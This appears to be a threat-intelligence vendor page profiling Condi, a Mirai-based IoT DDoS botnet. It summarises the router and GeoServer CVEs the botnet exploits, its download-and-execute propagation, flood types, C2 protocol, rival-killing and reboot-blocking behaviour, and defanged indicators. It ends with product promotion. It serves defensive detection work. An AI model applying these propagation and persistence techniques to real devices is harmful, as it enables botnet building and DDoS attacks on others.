Condi
Condi is a Mirai-based IoT botnet malware family and DDoS-as-a-service botnet observed targeting embedded Linux devices, especially routers and other IoT systems. It has been documented exploiting TP-Link Archer AX21 routers via CVE-2023-1389 and has also been delivered in campaigns exploiting GeoServer CVE-2024-36401. Reporting also links Condi-related Mirai-like payloads to attempted exploitation of end-of-life TP-Link routers affected by CVE-2023-33538, where downloaded ARM binaries contained multiple references to the string "condi" and behaved as Condi variants.
Its propagation includes scanning for HTTP services on ports 80 and 8080 and sending hardcoded exploit requests that download and execute remote shell scripts on vulnerable devices. FortiGuard observed Condi using a downloader script from cdn2[.]duc3k[.]com/t against CVE-2023-1389 targets, and older source code indicates additional propagation logic including Android Debug Bridge scanning on TCP/5555. In GeoServer exploitation, Condi was reported downloading multi-architecture bot binaries from hxxp://209[.]146[.]124[.]181:8030 and executing them from /tmp. Condi samples were also associated with repeated DNS queries to trcpay[.]xyz.
The malware is designed for DDoS operations and supports multiple flooding methods. Reported attack capabilities include TCP SYN, TCP ACK, TCP flood variants, TCP STOMP-like flooding, UDP PLAIN, threaded UDP flooding, UDP flooding with extra error handling, and VSE attacks. Fortinet specifically noted TCP flooding, UDP flooding, and VSE DDoS functionality.
Condi uses a modified Mirai binary command-and-control protocol. One analyzed sample used registration bytes \x33\x66\x99, noted as commonly associated with Moobot. Supported C2-controlled functions include heartbeat or bot activity checks, termination, lockdown-related functionality, self-update, starting an embedded HTTP server, updating served binaries, and reporting the webserver port. Some Condi-related samples update from hard-coded infrastructure including 51.38.137[.]113 over TCP/80 and can retrieve binaries for multiple CPU architectures. The malware can also turn infected devices into HTTP servers on random high ports to distribute architecture-specific binaries and aid propagation, sometimes masquerading as Apache via the "Server: Apache" header.
Behaviorally, Condi includes aggressive process-killing and anti-competition logic. It reads /proc/<PID>/status, attempts to kill processes matching selected names, kills binaries whose filenames contain architecture strings such as x86, x86_64, arm, arm5, arm6, arm7, mips, mipsel, sh4, and ppc, and generates random strings or command-line length heuristics to terminate additional processes. It also scans for and terminates specific processes to avoid detection. To hinder recovery and maintain control, Condi attempts to prevent device reboot by deleting reboot, shutdown, poweroff, and halt binaries from common Linux paths. Fortinet noted it cannot survive a normal reboot, but it tries to obstruct reboot actions on infected routers.
Observed infrastructure and identifiers include cdn2[.]duc3k[.]com, admin[.]duc3k[.]com, 209[.]146[.]124[.]181:8030, trcpay[.]xyz, 51.38.137[.]113, and cnc.vietdediserver[.]shop. A FortiGuard-analyzed ARM sample had SHA-256 509f5bb6bcc0f2da762847364f7c433d1179fb2b2f4828eefb30828c485a3084. Fortinet detections cited in the reporting include Linux/Mirai.REAL!tr and Linux/Mirai.CDB!tr. Condi has been advertised via a Telegram channel named "Condi Network," and FortiGuard linked the malware to a Telegram contact shown on related infrastructure. The content consistently characterizes Condi as an IoT-focused Mirai-family botnet used for large-scale DDoS activity and remote control of compromised devices.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
FortiGuard Labs encountered recent samples of a DDoS-as-a-service botnet calling itself Condi. It attempted to spread by exploiting TP-Link Archer AX21 (AX1800) routers vulnerable to CVE-2023-1389... While the sample we analyzed only contained the scanner for CVE-2023-1389... in our case, of an infection via CVE-2023-1389, “0days”. | FortiGuard Labs encountered recent samples of a DDoS-as-a-service botnet calling itself Condi. It attempted to spread by exploiting TP-Link Archer AX21 (AX1800) routers vulnerable to CVE-2023-1389.
The attacks, in this case, attempt to deploy a Mirai-like botnet malware, with the source code featuring numerous references to the string "Condi." | Unit 42 said it detected active, automated scans and probes attempting to exploit CVE-2023-33538 (CVSS score: 8.8), a command injection vulnerability impacting EoL TP-Link wireless routers, albeit using a flawed approach that doesn't result in a successful compromise.
The Broadside malware infects TBK DVR devices impacted by CVE-2024-3721, an OS command injection flaw that can be exploited remotely for arbitrary code execution.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
3 techniques
Execution
sends a hardcoded exploitation request... to download and execute a remote shell script at hxxp://cdn2[.]duc3k[.]com/t... The remote shell script is typical of Mirai-based loaders that try to download and execute binaries of each architecture in turn
Stealth
3 techniques
Stealth
Defense Impairment
1 technique
Defense Impairment
Discovery
3 techniques
Discovery
it embeds a simple scanner modified from Mirai’s original Telnet scanner to scan for any public IPs with open ports 80 or 8080... We found source code for an older version of Condi that scans for devices with an open Android Debug Bridge port (TCP/5555)
Lateral Movement
2 techniques
Lateral Movement
The arm7 binary also starts an HTTP server on the infected device using a port randomly chosen between 1024 and 65535. Once active, this server delivers fresh malware copies to other devices that connect to it, spreading the infection further without requiring any additional input from the attacker.
Command and Control
5 techniques
Command and Control
The binary protocol used by Condi to communicate with the C2 server is a modified version of that initially implemented in Mirai.
Once it receives the command used to start the webserver, this malware downloads bot binaries... After that, it starts a basic HTTP server on a random port number above 1024 to host these binaries.
The binary protocol used by Condi to communicate with the C2 server is a modified version of that initially implemented in Mirai.
Impact
3 techniques
Impact
it also prevents infections from other botnets by attempting to terminate their processes... kills any processes with matching names... kills any processes with binary filenames containing the following extensions commonly used by other botnets
IOCs tracked for this family
29 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Condi is referenced as an IoT botnet whose malware is similar to the observed arm7 Mirai variant. The binary acts as a command-driven bot and distribution node, connecting to C2 infrastructure, executing commands, updating itself, and serving malware binaries to spread across devices.
A Mirai-like botnet malware referenced in source code strings. The malware can update itself and act as a web server to spread infection to other connected devices.
Mirai-based IoT botnet malware deployed to vulnerable TP-Link routers after exploitation of CVE-2023-33538. Once executed, it connects to a C2 server, sends heartbeats, supports self-updates, starts an HTTP server on the infected device, and helps propagate malware copies to additional devices.
An IoT botnet malware family referenced as closely matching the downloaded arm7 sample. The sample contains multiple 'condi' strings and exhibits Mirai-like botnet behavior including C2 command handling, self-update across multiple architectures, and HTTP-based propagation support.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.